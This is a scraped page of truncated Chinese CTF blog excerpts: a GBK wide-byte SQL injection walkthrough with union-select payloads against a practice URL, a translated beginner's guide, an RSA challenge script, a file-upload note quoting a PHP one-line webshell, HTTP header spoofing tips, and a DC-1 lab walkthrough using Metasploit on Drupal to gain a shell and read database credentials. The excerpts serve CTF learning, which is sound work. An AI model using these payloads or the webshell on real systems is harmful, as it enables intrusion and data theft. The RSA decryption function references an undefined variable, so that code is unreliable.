ctf

CG CTF GBK Injection

╄→гoц情女王★ 提交于 2020-02-23 21:53:24
题目链接 GBK Injection想到宽字节注入,首先了解宽字节注入的原理 链接 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2# 发现#被过滤掉了,遂使用%23(url编码) http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 order by 2%23 判断出表中有两列,就可以用:union select获取当前的库了 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 union select 1,database()%23 没有爆出库的信息emm…因为没有and 1=2,又因为这个地方可能只接受一个参数 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,database()%23 当前的库名为sae-chinalover,通过库名爆表名 http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27 and 1=2 union select 1,group_concat(table

[译]如何开始CTF

醉酒当歌 提交于 2020-02-19 07:36:22
[译]如何开始CTF Steve Vittitoe 发表于 2014.6.9 译者:wngg 英语水平很差,翻译纯粹是为了兴趣和练习英语。 如果我的翻译能帮到您,那真是太好了。 有不好的地方希望大佬们可以帮我指出来,多谢! 原文地址: How to Get Started in CTF 参考资料: CTF Wiki 原文: 在过去的两周里,我分析了第22届DEFCON大赛里的两道题: “shitsco” 和 “nonameyet” ,感谢每一条的评论和提问,其中被提过最多的问题是“如何开始CTF?”。不久前,我也问过自己同样的问题。最简单的方法就是注册一个CTF平台,比如 CSAW 、 Pico CTF 、 Microcorruption 或者其他在 此页 内的网站。通过练习、耐心和奉献,你的能力就会一天天提高。 如果你平时想做一些题目, 这里 存了大多数比赛的题目。这些题目通常会有许多不同级别,对于最简单难度的题目也不能大意,难不难取决于你的技术。比如你擅长取证分析(forensics)题但是对密码攻击(crypto)题不太熟,那么你可能取证分析题得到分数很多而密码攻击题得到的分很少。对于CTF出题者来说各自也有擅长的领域,这也是难以评定CTF难度的原因之一。 如果你已经自己尝试过简单的题目并且还在努力着,那么你很有可能自学成功。CTF竞赛通常注重一下技能:逆向工程

HacTM CTF Crypto RSA is easy #1

谁说胖子不能爱 提交于 2020-02-16 23:29:56
2020.2.1 HackTM CTF 的一道Crypto题 这道题很简单 给出源码: import random from my_math import next_prime from flag import flag def egcd(a, b): x, y, u, v = 0, 1, 1, 0 while a != 0: q, r = b//a, b % a m, n = x-u*q, y-v*q b, a, x, y, u, v = a, r, u, v, m, n gcd = b return gcd, x, y def gen_keys(p, q): e = 65537 n = p * q phi = (p - 1) * (q - 1) gcd, d, b = egcd(e, phi) return ((e, n), (d, n)) def enc(publickey, plain): e, n = publickey cipher = [pow(ord(char), e, n) for char in plain] return cipher def dec(pk, c): #pk = (d, n) d, n = pk plain = [chr(pow(char, key, n)) for char in c] return ''.join(plain) p =

CTF-文件上传

喜欢而已 提交于 2020-02-11 18:23:49
CTF-文件上传 写在前面: 文件上传漏洞常用于获取 webshell ,从而取得对目标网站(系统)的控制权。要获取 shell ,需要: 1.知道上传后文件所保存位置(不知道那就猜、爆破) 2.上传后文件的名字(是否被更改) 00一句话木马 <?php eval($_POST['password']);?> 一句话木马原理及不同类型: https://baike.baidu.com/item/%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/1845646?fr=aladdin 在文章后续会根据例子提供一句话木马的变式 01 毫无过滤 直接上传即可获取 webshell 02 前端过滤 2.1绕过js过滤 例: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")

CTF WEB总结

只谈情不闲聊 提交于 2020-02-06 23:15:31
1.http协议报头 使用referer字段来伪造来源 问:某些页面要求你必须要通过http://www.xxxx.com进行访问? 答:增加一个referer字段 Referrer:http://www.xxxx.com (题目要求的url) 使用X-Forwarded-For来伪造ip 问:题目要求必须是某个ip地址如1.1.1.1,才允许访问。 答:增加一个X-Forwarded-For字段 X-Forwarded-For:1.1.1.1 使用User-Agent:伪造代理 问:某些题目要求必须使用某个浏览器如HAHA浏览器,才允许访问。 答:增加User-Agent字段 User-Agent:HAHA 问:页面要求必须要安装了.net 9.0版本了才能访问。 答:修改User-Agent字段 User-Agent:.NET CLR 9 使用Accept-Language修改语言 问:题目要求只能外国人才能访问这个页面。 答:修改Accept-Language字段 Accept-Language: en-US,en;q=0.8 直接查看http协议报头 问:题目什么都没有提示,但是答案就直接是藏在http请求报头里面。 答:在使用burp suit的时候注意看清楚头部有哪些内容。 2.sql注入 判断是否过滤常见关键字 答:在输入框中输入字符串

CTF--靶场夺旗

老子叫甜甜 提交于 2020-02-04 19:16:26
开门见山 1. 扫描靶场 ip 192.168.1.106 2. 扫描靶场开放端口 3. 扫描靶场全部信息 4. 探测靶场敏感信息 5. 对一些特殊的端口进行 nc 探测 6. 为了绕过对应命令执行限制,可以使用相近命令来代替限制的 shell 命令 例: cat - more 来源: https://www.cnblogs.com/joker-vip/p/12260088.html

一个入门级CTF的Reverse

喜夏-厌秋 提交于 2020-02-02 22:13:56
这道题是XCTF攻防世界上的一道新手入门题目! 年前刚接触逆向时IDA,OD了这些工具都不会用(负基础),当时做这些题的时候觉得挺难(主要是缺少练习,没思路无从下手)。现在回头再来看这些题目感觉确实是入门级的题目,所以逆向是门艺术更是门技术,需要多练习熟悉工具和掌握一些技巧,下面就来分析一下这道题目。 题目给了一个附件是一个exe的可执行文件,那好我们先来执行一下他好了! 结果出来一大堆英文,奈何本人英文真的很菜,高考40分:),浑身发憷,不怕手机自带拍照翻译,虽然翻译的水平很一般但是磕磕绊绊的还是能明白他什么意思: 这是个游戏(游戏规则:把那几个图形都看成灯,当其都亮时,也就是图形变成实心的游戏胜利),你必须把这个游戏过了之后才会得到我们想要的flag。 我们是要通过工具来获得这个flag,当然如果你玩游戏很nb的话你也可以通关他获得flag。 好废话不多说我们现在就来寻找flag! 1. 我们先用PEID分析一下程序的基本信息 可以看到检测到其未压缩,说明此程序无壳。下面我们可以选择用静态分析工具IDA来分析程序,也可以选用动态调试工具Ollydbg。 我们先用IDA来分析吧,因为此程序为32位的所以我们用32位的IDA打开程序。 我们按Ctrl + E弹出入口函数的信息,点击确定进入入口函数。因为此程序是一个控制台程序,所以我们需要找到main函数(处理逻辑在main函数里)

我的ctf学习笔记 misc(一)

荒凉一梦 提交于 2020-02-02 05:02:03
今天学习了bugku网站上的题,学习初期还是很多东西不会,记录下来 头像题下载图片winhex打开搜flag再加密就行了 然后就是这两题 1 .0和1的故事 给了一个压缩包,打开后有个flag{}.txt文件,然后用winhex打开,题目信息:空格和0很配,就是空格代表0,20是表示0,09表示1,从第一个09截取到最后,转换为16进制就ok了 2. 这个人真的很高 根据题目提示修改图片高度,找到宽和高转换为16进制,在winhex找到高代表的16进制码,修改后可看到 还有结尾神奇的字符串 看大佬的writeup说是栅栏密码,然后拼起来在第四栏加密时发现最像,改一下顺序就行了,还不知道正确的解法怎么解 来源: CSDN 作者: Eternal_yuan 链接: https://blog.csdn.net/Eternal_yuan/article/details/104134653

小白言承之PWN学习路线(持续更新)

会有一股神秘感。 提交于 2020-01-30 01:24:28
PWN(溢出): PWN在黑客俚语中代表着攻破,取得权限,在CTF比赛中它代表着溢出类的题目,其中常见类型溢出漏洞有栈溢出、堆溢出。在CTF比赛中,线上比赛会有,但是比例不会太重,进入线下比赛,逆向和溢出则是战队实力的关键。主要考察参数选手漏洞挖掘和利用能力。 CTF PWN特点:入门难、进阶难、精通难 之前学习东西比较杂,经过一段时间的学习,有点feeling了。这里主要记录下自己的学习历程,仅供大家参考。 (1)首先是汇编基础:王爽的《汇编语言》 (2)滴水公开课 :https://www.bilibili.com/video/av20193835?from=search&seid=5407506588268642108 (3)攻防世界刷题: https://adworld.xctf.org.cn/personal (4)君莫笑视频: https://space.bilibili.com/14500640/ (5)《0day安全:软件漏洞分析技术》 (2020.1.29)言承将栈溢出这块差不多比较清楚了,接下来往堆溢出方向学习。 来源: CSDN 作者: 言承Yolanda 链接: https://blog.csdn.net/qq_43935969/article/details/104107872

[CTF challenge] DC-1

醉酒当歌 提交于 2020-01-29 23:30:28
点击下载靶机 环境:vm虚拟机、kali 2019.4、NAT网络模式。 kali开机,dc-1开机。 step1.打开终端,输入命令“ifconfig”查看当前网段(要将靶机与kali设置在同一网段下)。 step2.打开nmap,扫描自己网段下的主机,发现靶机。(在终端中输入nmap或者加帮助选项nmap -h 即可查看帮助手册)可以看到靶机开放了22号端口提供ssh服务以及80端口http服务。 step3.打开浏览器,访问靶机,这里可以发现,该站点使用了“Drupal” cms建站系统,可以尝试使用该cms相应的工具或漏洞。 step4.打开msfconsole,搜索drupal相关内容。法相相关模块后,选择一个较新的使用,更具参数要求设置相关参数,最后 run!成功后,输入shell,发现我目前以www-data身份在服务器上(在终端输入msfconsole进入后可以使用help查看使用手册) step5.使用python获得一个交互式终端 点击这里查看python pty相关解释 这里发现了flag1.txt,它提示我们CMS需要一个配置文件,且非常有用。 step6.翻可疑的文件,文件夹,找到配置文件(/sites/default/sittings.php)这里发现了该站点使用的mysql的用户名和密码 step7.登录MySQL,进入相关数据库(use